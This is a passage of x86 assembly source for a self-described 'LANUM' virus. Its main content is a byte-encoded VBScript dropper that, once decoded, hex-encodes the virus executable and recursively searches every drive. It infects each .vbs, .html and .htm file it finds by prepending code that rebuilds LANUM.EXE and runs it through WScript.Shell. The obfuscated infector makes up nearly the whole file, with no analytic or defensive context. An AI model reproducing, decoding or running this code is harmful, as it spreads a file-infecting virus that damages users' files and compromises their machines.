num_bytes_written       dd      ? 
vfile                   db      68d,58d,92d,76d,65d,78d,85d,77d,46d,86d,66d,83d,00h
cmdline                 db      67d,83d,67d,82d,73d,80d,84d,32d,68d,58d,92d,108d,97d,110d,117d,109d,46d,118d,98d,115d,00h
flz_handle              dd      ?

FILE_ATTRIBUTE_NORMAL   equ     00000080h
CREATE_ALWAYS           equ     00000002h
FILE_SHARE_READ         equ     00000001h
GENERIC_WRITE           equ     40000000h

Dropper:
db 82d,69d,77d,32d,76d,65d,78d,85d,77d,13d,10d,111d,110d
db 32d,101d,114d,114d,111d,114d,32d,114d,101d,115d,117d,109d,101d
db 32d,110d,101d,120d,116d,13d,10d,109d,115d,103d,98d,111d,120d
db 32d,34d,87d,105d,110d,51d,50d,47d,80d,69d,47d,72d,84d
db 77d,47d,86d,66d,83d,32d,76d,65d,78d,85d,77d,32d,86d
db 105d,114d,117d,115d,32d,70d,97d,109d,105d,108d,121d,32d,45d
db 32d,80d,115d,121d,99d,104d,111d,108d,111d,103d,105d,99d,47d
db 51d,102d,34d,44d,118d,98d,105d,110d,102d,111d,114d,109d,97d
db 116d,105d,111d,110d,44d,34d,76d,97d,110d,117d,109d,32d,118d
db 105d,114d,117d,115d,32d,45d,32d,80d,115d,121d,99d,104d,111d
db 108d,111d,103d,105d,99d,34d,13d,10d,99d,111d,110d,115d,116d
db 32d,97d,100d,84d,121d,112d,101d,66d,105d,110d,97d,114d,121d
db 61d,49d,32d,13d,10d,67d,111d,110d,115d,116d,32d,97d,100d
db 84d,121d,112d,101d,84d,101d,120d,116d,61d,50d,32d,13d,10d
db 115d,101d,116d,32d,98d,115d,61d,99d,114d,101d,97d,116d,101d
db 111d,98d,106d,101d,99d,116d,40d,34d,65d,68d,79d,68d,66d
db 46d,83d,116d,114d,101d,97d,109d,34d,41d,13d,10d,98d,115d
db 46d,84d,121d,112d,101d,61d,49d,58d,98d,115d,46d,111d,112d
db 101d,110d,58d,98d,115d,46d,108d,111d,97d,100d,102d,114d,111d
db 109d,102d,105d,108d,101d,32d,34d,68d,58d,92d,76d,65d,78d
db 85d,77d,46d,69d,88d,69d,34d,58d,98d,115d,46d,102d,108d
db 117d,115d,104d,58d,98d,115d,46d,112d,111d,115d,105d,116d,105d
db 111d,110d,32d,61d,32d,48d,13d,10d,98d,115d,46d,116d,121d
db 112d,101d,61d,50d,58d,98d,115d,46d,99d,104d,97d,114d,115d
db 101d,116d,61d,34d,105d,115d,111d,45d,56d,56d,53d,57d,45d
db 49d,34d,58d,109d,61d,98d,115d,46d,114d,101d,97d,100d,116d
db 101d,120d,116d,58d,104d,61d,48d,58d,13d,10d,70d,111d,114d
db 32d,107d,32d,61d,32d,49d,32d,84d,111d,32d,76d,101d,110d
db 40d,109d,41d,13d,10d,104d,61d,104d,43d,49d,13d,10d,115d
db 116d,114d,67d,104d,97d,114d,32d,61d,32d,77d,105d,100d,40d
db 109d,44d,32d,107d,44d,32d,49d,41d,13d,10d,115d,116d,114d
db 72d,101d,120d,32d,61d,32d,82d,105d,103d,104d,116d,40d,34d
db 48d,48d,34d,32d,38d,32d,72d,101d,120d,40d,65d,115d,99d
db 40d,115d,116d,114d,67d,104d,97d,114d,41d,41d,44d,32d,50d
db 41d,13d,10d,105d,102d,32d,104d,61d,49d,48d,48d,32d,116d
db 104d,101d,110d,13d,10d,115d,116d,114d,104d,101d,120d,118d,97d
db 108d,117d,101d,32d,61d,32d,115d,116d,114d,72d,101d,120d,86d
db 97d,108d,117d,101d,32d,38d,32d,115d,116d,114d,104d,101d,120d
db 32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 118d,98d,99d,114d,108d,102d,32d,38d,32d,34d,115d,116d,114d
db 72d,101d,120d,86d,97d,108d,117d,101d,61d,115d,116d,114d,72d
db 101d,120d,86d,97d,108d,117d,101d,38d,34d,32d,38d,32d,99d
db 104d,114d,40d,51d,52d,41d,13d,10d,104d,61d,48d,13d,10d
db 101d,108d,115d,101d,13d,10d,115d,116d,114d,104d,101d,120d,118d
db 97d,108d,117d,101d,32d,61d,32d,115d,116d,114d,72d,101d,120d
db 86d,97d,108d,117d,101d,32d,38d,32d,115d,116d,114d,104d,101d
db 120d,13d,10d,101d,110d,100d,32d,105d,102d,13d,10d,110d,101d
db 120d,116d,13d,10d,115d,101d,116d,32d,76d,65d,78d,85d,77d
db 32d,61d,32d,67d,114d,101d,97d,116d,101d,79d,98d,106d,101d
db 99d,116d,40d,34d,87d,83d,99d,114d,105d,112d,116d,46d,83d
db 104d,101d,108d,108d,34d,41d,32d,13d,10d,83d,101d,116d,32d
db 102d,115d,111d,32d,61d,32d,99d,114d,101d,97d,116d,101d,111d
db 98d,106d,101d,99d,116d,40d,34d,115d,99d,114d,105d,112d,116d
db 105d,110d,103d,46d,102d,105d,108d,101d,115d,121d,115d,116d,101d
db 109d,111d,98d,106d,101d,99d,116d,34d,41d,13d,10d,83d,101d
db 116d,32d,68d,114d,105d,118d,101d,115d,61d,102d,115d,111d,46d
db 100d,114d,105d,118d,101d,115d,32d,13d,10d,70d,111d,114d,32d
db 69d,97d,99d,104d,32d,68d,114d,105d,118d,101d,32d,105d,110d
db 32d,68d,114d,105d,118d,101d,115d,13d,10d,73d,102d,32d,100d
db 114d,105d,118d,101d,46d,105d,115d,114d,101d,97d,100d,121d,32d
db 116d,104d,101d,110d,13d,10d,68d,111d,115d,101d,97d,114d,99d
db 104d,32d,100d,114d,105d,118d,101d,32d,38d,32d,34d,92d,34d
db 13d,10d,101d,110d,100d,32d,73d,102d,32d,13d,10d,78d,101d
db 120d,116d,32d,13d,10d,102d,117d,110d,99d,116d,105d,111d,110d
db 32d,68d,111d,115d,101d,97d,114d,99d,104d,40d,112d,97d,116d
db 104d,41d,13d,10d,111d,110d,32d,101d,114d,114d,111d,114d,32d
db 114d,101d,115d,117d,109d,101d,32d,110d,101d,120d,116d,13d,10d
db 83d,101d,116d,32d,70d,111d,108d,100d,101d,114d,61d,102d,115d
db 111d,46d,103d,101d,116d,102d,111d,108d,100d,101d,114d,40d,112d
db 97d,116d,104d,41d,13d,10d,83d,101d,116d,32d,70d,105d,108d
db 101d,115d,32d,61d,32d,102d,111d,108d,100d,101d,114d,46d,102d
db 105d,108d,101d,115d,13d,10d,70d,111d,114d,32d,69d,97d,99d
db 104d,32d,70d,105d,108d,101d,32d,105d,110d,32d,102d,105d,108d
db 101d,115d,13d,10d,73d,102d,32d,102d,115d,111d,46d,71d,101d
db 116d,69d,120d,116d,101d,110d,115d,105d,111d,110d,78d,97d,109d
db 101d,40d,102d,105d,108d,101d,46d,112d,97d,116d,104d,41d,61d
db 34d,118d,98d,115d,34d,32d,116d,104d,101d,110d,13d,10d,83d
db 101d,116d,32d,83d,99d,114d,105d,112d,116d,115d,32d,61d,32d
db 70d,83d,79d,46d,79d,112d,101d,110d,84d,101d,120d,116d,70d
db 105d,108d,101d,40d,70d,105d,108d,101d,46d,112d,97d,116d,104d
db 44d,32d,49d,44d,32d,84d,114d,117d,101d,41d,13d,10d,73d
db 102d,32d,83d,99d,114d,105d,112d,116d,115d,46d,82d,101d,97d
db 100d,76d,105d,110d,101d,32d,60d,62d,32d,34d,82d,69d,77d
db 32d,76d,65d,78d,85d,77d,34d,32d,116d,104d,101d,110d,13d
db 10d,83d,101d,116d,32d,83d,99d,114d,105d,112d,116d,115d,32d
db 61d,32d,70d,83d,79d,46d,79d,112d,101d,110d,84d,101d,120d
db 116d,70d,105d,108d,101d,40d,70d,105d,108d,101d,46d,112d,97d
db 116d,104d,44d,32d,49d,44d,32d,84d,114d,117d,101d,41d,13d
db 10d,83d,99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d
db 101d,32d,61d,32d,83d,99d,114d,105d,112d,116d,115d,46d,82d
db 101d,97d,100d,65d,108d,108d,13d,10d,83d,101d,116d,32d,117d
db 32d,61d,32d,70d,83d,79d,46d,79d,112d,101d,110d,84d,101d
db 120d,116d,70d,105d,108d,101d,40d,70d,105d,108d,101d,46d,112d
db 97d,116d,104d,44d,32d,50d,44d,32d,84d,114d,117d,101d,41d
db 13d,10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d
db 32d,34d,82d,69d,77d,32d,76d,65d,78d,85d,77d,34d,13d
db 10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d
db 83d,99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d,101d
db 13d,10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d
db 32d,34d,115d,116d,114d,72d,101d,120d,86d,97d,108d,117d,101d
db 61d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d
db 38d,32d,115d,116d,114d,104d,101d,120d,118d,97d,108d,117d,101d
db 32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,13d,10d,117d
db 46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,83d
db 101d,116d,32d,111d,98d,106d,70d,83d,79d,32d,61d,32d,67d
db 114d,101d,97d,116d,101d,79d,98d,106d,101d,99d,116d,40d,34d
db 32d,38d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d
db 83d,99d,114d,105d,112d,116d,105d,110d,103d,46d,70d,105d,108d
db 101d,83d,121d,115d,116d,101d,109d,79d,98d,106d,101d,99d,116d
db 34d,32d,38d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 34d,41d,34d,13d,10d,117d,46d,87d,114d,105d,116d,101d,76d
db 105d,110d,101d,32d,34d,70d,111d,114d,32d,114d,61d,32d,49d
db 32d,84d,111d,32d,76d,101d,110d,40d,115d,116d,114d,72d,101d
db 120d,86d,97d,108d,117d,101d,41d,32d,83d,116d,101d,112d,32d
db 50d,32d,58d,32d,78d,101d,119d,67d,111d,100d,101d,32d,61d
db 32d,78d,101d,119d,67d,111d,100d,101d,32d,38d,32d,67d,104d
db 114d,40d,34d,32d,38d,99d,104d,114d,40d,51d,52d,41d,32d
db 38d,32d,34d,38d,104d,34d,32d,38d,32d,99d,104d,114d,40d
db 51d,52d,41d,32d,38d,32d,34d,38d,32d,77d,105d,100d,40d
db 115d,116d,114d,72d,101d,120d,86d,97d,108d,117d,101d,44d,32d
db 114d,44d,32d,50d,41d,41d,32d,58d,32d,110d,101d,120d,116d
db 34d,13d,10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d
db 101d,32d,34d,83d,101d,116d,32d,111d,98d,106d,70d,105d,108d
db 101d,50d,32d,61d,32d,111d,98d,106d,70d,83d,79d,46d,67d
db 114d,101d,97d,116d,101d,84d,101d,120d,116d,70d,105d,108d,101d
db 40d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d
db 38d,32d,34d,76d,65d,78d,85d,77d,46d,69d,88d,69d,34d
db 32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 34d,41d,32d,58d,32d,111d,98d,106d,70d,105d,108d,101d,50d
db 46d,119d,114d,105d,116d,101d,32d,32d,78d,101d,119d,67d,111d
db 100d,101d,32d,58d,32d,111d,98d,106d,70d,105d,108d,101d,50d
db 46d,99d,108d,111d,115d,101d,34d,32d,13d,10d,117d,46d,87d
db 114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,67d,114d,101d
db 97d,116d,101d,79d,98d,106d,101d,99d,116d,40d,34d,32d,38d
db 32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,87d
db 83d,99d,114d,105d,112d,116d,46d,83d,104d,101d,108d,108d,34d
db 32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d
db 34d,41d,46d,114d,117d,110d,32d,34d,32d,38d,32d,99d,104d
db 114d,40d,51d,52d,41d,32d,38d,32d,34d,76d,65d,78d,85d
db 77d,46d,69d,88d,69d,34d,32d,38d,32d,99d,104d,114d,40d
db 51d,52d,41d,13d,10d,101d,110d,100d,32d,105d,102d,32d,13d
db 10d,101d,110d,100d,32d,105d,102d,13d,10d,73d,102d,32d,108d
db 99d,97d,115d,101d,40d,102d,115d,111d,46d,71d,101d,116d,69d
db 120d,116d,101d,110d,115d,105d,111d,110d,78d,97d,109d,101d,40d
db 102d,105d,108d,101d,46d,112d,97d,116d,104d,41d,41d,61d,34d
db 104d,116d,109d,108d,34d,32d,111d,114d,32d,108d,99d,97d,115d
db 101d,40d,102d,115d,111d,46d,71d,101d,116d,69d,120d,116d,101d
db 110d,115d,105d,111d,110d,78d,97d,109d,101d,40d,102d,105d,108d
db 101d,46d,112d,97d,116d,104d,41d,41d,61d,34d,104d,116d,109d
db 34d,32d,116d,104d,101d,110d,13d,10d,83d,101d,116d,32d,83d
db 99d,114d,105d,112d,116d,115d,32d,61d,32d,70d,83d,79d,46d
db 79d,112d,101d,110d,84d,101d,120d,116d,70d,105d,108d,101d,40d
db 70d,105d,108d,101d,46d,112d,97d,116d,104d,44d,32d,49d,44d
db 32d,84d,114d,117d,101d,41d,13d,10d,73d,102d,32d,83d,99d
db 114d,105d,112d,116d,115d,46d,82d,101d,97d,100d,76d,105d,110d
db 101d,32d,60d,62d,32d,34d,60d,33d,45d,45d,76d,65d,78d
db 85d,77d,45d,45d,62d,34d,32d,116d,104d,101d,110d,13d,10d
db 83d,101d,116d,32d,83d,99d,114d,105d,112d,116d,115d,32d,61d
db 32d,70d,83d,79d,46d,79d,112d,101d,110d,84d,101d,120d,116d
db 70d,105d,108d,101d,40d,70d,105d,108d,101d,46d,112d,97d,116d
db 104d,44d,32d,49d,44d,32d,84d,114d,117d,101d,41d,13d,10d
db 83d,99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d,101d
db 32d,61d,32d,83d,99d,114d,105d,112d,116d,115d,46d,82d,101d
db 97d,100d,65d,108d,108d,32d,13d,10d,83d,101d,116d,32d,117d
db 32d,61d,32d,70d,83d,79d,46d,79d,112d,101d,110d,84d,101d
db 120d,116d,70d,105d,108d,101d,40d,70d,105d,108d,101d,46d,112d
db 97d,116d,104d,44d,32d,50d,44d,32d,84d,114d,117d,101d,41d
db 13d,10d,117d,46d,119d,114d,105d,116d,101d,108d,105d,110d,101d
db 32d,34d,60d,33d,45d,45d,76d,65d,78d,85d,77d,45d,45d
db 62d,34d,32d,13d,10d,117d,46d,119d,114d,105d,116d,101d,108d
db 105d,110d,101d,32d,34d,60d,104d,116d,109d,108d,62d,60d,66d
db 111d,100d,121d,62d,60d,83d,99d,114d,105d,112d,116d,32d,108d
db 97d,110d,103d,117d,97d,103d,101d,61d,34d,32d,38d,32d,99d
db 104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,86d,66d,83d
db 99d,114d,105d,112d,116d,34d,32d,38d,32d,99d,104d,114d,40d
db 51d,52d,41d,32d,38d,32d,34d,62d,34d,13d,10d,117d,46d
db 87d,114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,115d,116d
db 114d,72d,101d,120d,86d,97d,108d,117d,101d,61d,34d,32d,38d
db 32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,115d,116d
db 114d,104d,101d,120d,118d,97d,108d,117d,101d,32d,38d,32d,99d
db 104d,114d,40d,51d,52d,41d,13d,10d,117d,46d,87d,114d,105d
db 116d,101d,76d,105d,110d,101d,32d,34d,83d,101d,116d,32d,111d
db 98d,106d,70d,83d,79d,32d,61d,32d,67d,114d,101d,97d,116d
db 101d,79d,98d,106d,101d,99d,116d,40d,34d,32d,38d,99d,104d
db 114d,40d,51d,52d,41d,32d,38d,32d,34d,83d,99d,114d,105d
db 112d,116d,105d,110d,103d,46d,70d,105d,108d,101d,83d,121d,115d
db 116d,101d,109d,79d,98d,106d,101d,99d,116d,34d,32d,38d,99d
db 104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,41d,34d,13d
db 10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d
db 34d,70d,111d,114d,32d,114d,61d,32d,49d,32d,84d,111d,32d
db 76d,101d,110d,40d,115d,116d,114d,72d,101d,120d,86d,97d,108d
db 117d,101d,41d,32d,83d,116d,101d,112d,32d,50d,32d,58d,32d
db 78d,101d,119d,67d,111d,100d,101d,32d,61d,32d,78d,101d,119d
db 67d,111d,100d,101d,32d,38d,32d,67d,104d,114d,40d,34d,32d
db 38d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,38d
db 104d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,32d
db 38d,32d,34d,38d,32d,77d,105d,100d,40d,115d,116d,114d,72d
db 101d,120d,86d,97d,108d,117d,101d,44d,32d,114d,44d,32d,50d
db 41d,41d,32d,58d,32d,110d,101d,120d,116d,34d,13d,10d,117d
db 46d,87d,114d,105d,116d,101d,76d,105d,110d,101d,32d,34d,83d
db 101d,116d,32d,111d,98d,106d,70d,105d,108d,101d,50d,32d,61d
db 32d,111d,98d,106d,70d,83d,79d,46d,67d,114d,101d,97d,116d
db 101d,84d,101d,120d,116d,70d,105d,108d,101d,40d,34d,32d,38d
db 32d,99d,104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,76d
db 65d,78d,85d,77d,46d,69d,88d,69d,34d,32d,38d,32d,99d
db 104d,114d,40d,51d,52d,41d,32d,38d,32d,34d,41d,32d,58d
db 32d,111d,98d,106d,70d,105d,108d,101d,50d,46d,119d,114d,105d
db 116d,101d,32d,32d,78d,101d,119d,67d,111d,100d,101d,32d,58d
db 32d,111d,98d,106d,70d,105d,108d,101d,50d,46d,99d,108d,111d
db 115d,101d,34d,13d,10d,117d,46d,87d,114d,105d,116d,101d,76d
db 105d,110d,101d,32d,34d,67d,114d,101d,97d,116d,101d,79d,98d
db 106d,101d,99d,116d,40d,34d,32d,38d,32d,99d,104d,114d,40d
db 51d,52d,41d,32d,38d,32d,34d,87d,83d,99d,114d,105d,112d
db 116d,46d,83d,104d,101d,108d,108d,34d,32d,38d,32d,99d,104d
db 114d,40d,51d,52d,41d,32d,38d,32d,34d,41d,46d,114d,117d
db 110d,32d,34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d
db 32d,38d,32d,34d,76d,65d,78d,85d,77d,46d,69d,88d,69d
db 34d,32d,38d,32d,99d,104d,114d,40d,51d,52d,41d,13d,10d
db 117d,46d,119d,114d,105d,116d,101d,108d,105d,110d,101d,32d,34d
db 60d,34d,32d,38d,32d,99d,104d,114d,40d,52d,55d,41d,32d
db 38d,32d,34d,115d,99d,114d,105d,112d,116d,62d,60d,47d,98d
db 111d,100d,121d,62d,60d,47d,104d,116d,109d,108d,62d,34d,32d
db 13d,10d,117d,46d,87d,114d,105d,116d,101d,76d,105d,110d,101d
db 32d,83d,99d,114d,105d,112d,116d,115d,83d,111d,117d,114d,99d
db 101d,13d,10d,101d,110d,100d,32d,105d,102d,32d,13d,10d,101d
db 110d,100d,32d,105d,102d,13d,10d,110d,101d,120d,116d,13d,10d
db 83d,101d,116d,32d,83d,117d,98d,102d,111d,108d,100d,101d,114d
db 115d,32d,61d,32d,102d,111d,108d,100d,101d,114d,46d,83d,117d
db 98d,70d,111d,108d,100d,101d,114d,115d,13d,10d,70d,111d,114d
db 32d,69d,97d,99d,104d,32d,83d,117d,98d,102d,111d,108d,100d
db 101d,114d,32d,105d,110d,32d,83d,117d,98d,102d,111d,108d,100d
db 101d,114d,115d,13d,10d,68d,111d,115d,101d,97d,114d,99d,104d
db 32d,83d,117d,98d,102d,111d,108d,100d,101d,114d,46d,112d,97d
db 116d,104d,32d,13d,10d,78d,101d,120d,116d,13d,10d,101d,110d
db 100d,32d,102d,117d,110d,99d,116d,105d,111d,110d,13d,10d
EndDropper:


lanum_end:

fake_host_addr: ret


